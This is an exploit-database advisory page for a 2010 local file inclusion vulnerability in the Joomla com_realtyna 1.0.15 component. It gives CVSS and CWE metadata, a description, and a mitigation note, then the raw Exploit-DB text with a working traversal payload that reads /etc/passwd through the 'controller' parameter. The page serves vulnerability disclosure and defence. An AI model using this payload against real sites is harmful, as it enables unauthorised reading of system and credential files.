header-logo
Suggest Exploit
vendor:
com_realtyna
by:
AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
7,5
CVSS
HIGH
Local File Inclusion
22
CWE
Product Name: com_realtyna
Affected Version From: 1.0.15
Affected Version To: 1.0.15
Patch Exists: Yes
Related CWE: N/A
CPE: a:realtyna:com_realtyna:1.0.15
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Joomla
2010

Joomla Component Realtyna Translator Local File Inclusion Vulnerability

A Local File Inclusion (LFI) vulnerability exists in the com_realtyna version 1.0.15 component for Joomla. An attacker can exploit this vulnerability to include arbitrary files from the web server, which can lead to the disclosure of sensitive information. The vulnerability is due to insufficient sanitization of user-supplied input to the 'controller' parameter of the 'index.php' script. An attacker can exploit this vulnerability by sending a malicious HTTP request containing directory traversal characters (e.g. '../') to the vulnerable script. Successful exploitation of this vulnerability can result in the disclosure of sensitive information.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of the software.
Source

Exploit-DB raw data:

==============================================================================================================


  [o] Joomla Component Realtyna Translator Local File Inclusion Vulnerability
 
       Software : com_realtyna version 1.0.15
       Vendor   : http://software.realtyna.com/
       Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
       Contact  : public[at]antisecurity[dot]org
       Home     : http://antisecurity.org/


==============================================================================================================


  [o] Exploit

       http://localhost/[path]/index.php?option=com_realtyna&controller=[LFI]


  [o] PoC

       http://localhost/index.php?option=com_realtyna&controller=../../../../../../../../../../etc/passwd%00


==============================================================================================================


  [o] Greetz

       Angela Zhang stardustmemory aJe martfella pizzyroot Genex
       H312Y yooogy mousekill }^-^{ noname matthews kaka11 wishnusakti
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke


==============================================================================================================


  [o] April 08 2010 - GMT +07:00 Jakarta, Indonesia

Navigation

Suggest Exploit

Services By CQR